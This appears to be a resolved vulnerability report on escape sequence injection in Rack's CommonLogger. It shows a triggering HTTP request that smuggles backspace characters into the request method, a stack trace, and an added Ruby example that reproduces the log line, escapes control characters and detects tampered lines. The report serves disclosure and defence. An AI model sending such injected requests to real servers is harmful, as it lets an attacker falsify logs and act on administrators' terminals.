Escape Sequence Injection vulnerability in Rack
Severity: Medium
Vulnerability Details
Dangerous bug in the CommonLogger of Rack that allows injecting escape sequences into logs; the same bug was already closed in WEBrick:
https://www.ruby-lang.org/en/news/2010/01/10/webrick-escape-sequence-injection/
The logger processes the query string correctly, but the request method is printed as is:
https://github.com/rack/rack/blob/master/lib/rack/common_logger.rb#L50
Triggering request:
```
GET\b\b\bPOST /sign_in?test1=1\b2 HTTP/1.0
Host: 127.0.0.1:4567
```
Result:
```
Rack::Lint::LintError: REQUEST_METHOD unknown: POST
/usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:21:in `assert'
/usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:340:in `check_env'
/usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:44:in `_call'
/usr/local/bundle/gems/rack-2.2.3/lib/rack/lint.rb:38:in `call'
/usr/local/bundle/gems/rack-2.2.3/lib/rack/show_exceptions.rb:23:in `call'
/usr/local/bundle/gems/rack-2.2.3/lib/rack/common_logger.rb:38:in `call'
/usr/local/bundle/gems/sinatra-2.1.0/lib/sinatra/base.rb:253:in `call'
/usr/local/bundle/gems/rack-2.2.3/lib/rack/content_length.rb:17:in `call'
/usr/local/bundle/gems/rack-2.2.3/lib/rack/handler/webrick.rb:95:in `service'
/usr/local/bundle/gems/webrick-1.7.0/lib/webrick/httpserver.rb:140:in `service'
/usr/local/bundle/gems/webrick-1.7.0/lib/webrick/httpserver.rb:96:in `run'
/usr/local/bundle/gems/webrick-1.7.0/lib/webrick/server.rb:310:in `block in start_thread'
172.19.0.1 - - [29/Nov/2021:12:19:06 +0000] "POST /sign_in?test1=1%082 HTTP/1.1" 500 950 0.0006
```
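The following is an added example, not Rack's code and not part of the report: a minimal formatter in the shape of the CommonLogger line shown above, fed a constructed env hash carrying the backspace-laden REQUEST_METHOD from the triggering request. It prints the raw line, a crude terminal-style rendering that explains why Lint reports the method as "POST", a hardened variant that renders control characters as `\xNN` in every request-derived field, and a check that flags raw control characters in existing log lines. The FORMAT string, the helper names and the env values are assumptions.

```ruby
# Added example, not Rack's code. Reproduces the log-line shape CommonLogger
# prints and shows escaping of control characters in every interpolated field.
# FORMAT, the helper names and the sample env are assumptions for this example.

# Assumed to mirror the Apache common log format CommonLogger emits
# (no trailing newline here, to keep comparisons simple).
FORMAT = %{%s - %s [%s] "%s %s%s%s %s" %d %s %0.4f}

# Constructed env hash: what the triggering request "GET\b\b\bPOST /sign_in?test1=1\b2"
# looks like once the server has percent-encoded the query string but left the method alone.
def sample_env(method = "GET\b\b\bPOST")
  {
    'REMOTE_ADDR'     => '172.19.0.1',
    'REQUEST_METHOD'  => method,
    'SCRIPT_NAME'     => '',
    'PATH_INFO'       => '/sign_in',
    'QUERY_STRING'    => 'test1=1%082',
    'SERVER_PROTOCOL' => 'HTTP/1.1'
  }
end

# Make ASCII control characters (0x00-0x1f, 0x7f) visible as \xNN so a terminal
# displays them instead of acting on them.
def escape_control(str)
  str.to_s.gsub(/[\x00-\x1f\x7f]/) { |c| format('\\x%02x', c.ord) }
end

# Vulnerable shape when escape: false (fields interpolated as received);
# hardened shape when escape: true (every request-derived field escaped).
def format_log_line(env, status, length, elapsed, now, escape: false)
  qs = env['QUERY_STRING'].to_s
  fields = [env['REQUEST_METHOD'], env['SCRIPT_NAME'], env['PATH_INFO'],
            qs.empty? ? '' : "?#{qs}", env['SERVER_PROTOCOL']]
  fields.map! { |f| escape_control(f) } if escape
  format(FORMAT, env['REMOTE_ADDR'], env['REMOTE_USER'] || '-',
         now.strftime('%d/%b/%Y:%H:%M:%S %z'), *fields, status, length, elapsed)
end

# Crude model of a terminal: backspace moves the cursor left one column and the
# next character overwrites. Explains why Lint reported "REQUEST_METHOD unknown: POST".
def render_as_terminal(str)
  cells = []
  pos = 0
  str.each_char do |c|
    if c == "\b"
      pos -= 1 if pos > 0
    else
      cells[pos] = c
      pos += 1
    end
  end
  cells.map { |c| c || ' ' }.join
end

# Detection over existing log lines: any raw control character other than the
# line terminator is suspicious in an access log.
def control_chars_in?(line)
  line.chomp.match?(/[\x00-\x1f\x7f]/)
end

if $PROGRAM_NAME == __FILE__
  now = Time.utc(2021, 11, 29, 12, 19, 6)
  raw = format_log_line(sample_env, 500, 950, 0.0006, now)
  puts "raw bytes:     #{raw.inspect}"
  puts "as a terminal: #{render_as_terminal(raw)}"
  puts "hardened:      #{format_log_line(sample_env, 500, 950, 0.0006, now, escape: true)}"
  puts "flagged?       #{control_chars_in?(raw)}"
end
```

The hardened formatter escapes the method, script name, path, query string and protocol alike rather than trusting the server to have encoded any one of them, since which fields arrive percent-encoded depends on the handler in front of Rack. The detection helper is what you would run over an existing access log to find lines that have already been tampered with.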
## Impact
An attacker can inject malicious escape sequences into the logs, making it possible for dangerous control characters to be executed on a victim's terminal emulator.
Report Stats
- Report ID: 1411867
- State: Closed
- Substate: resolved
- Upvotes: 2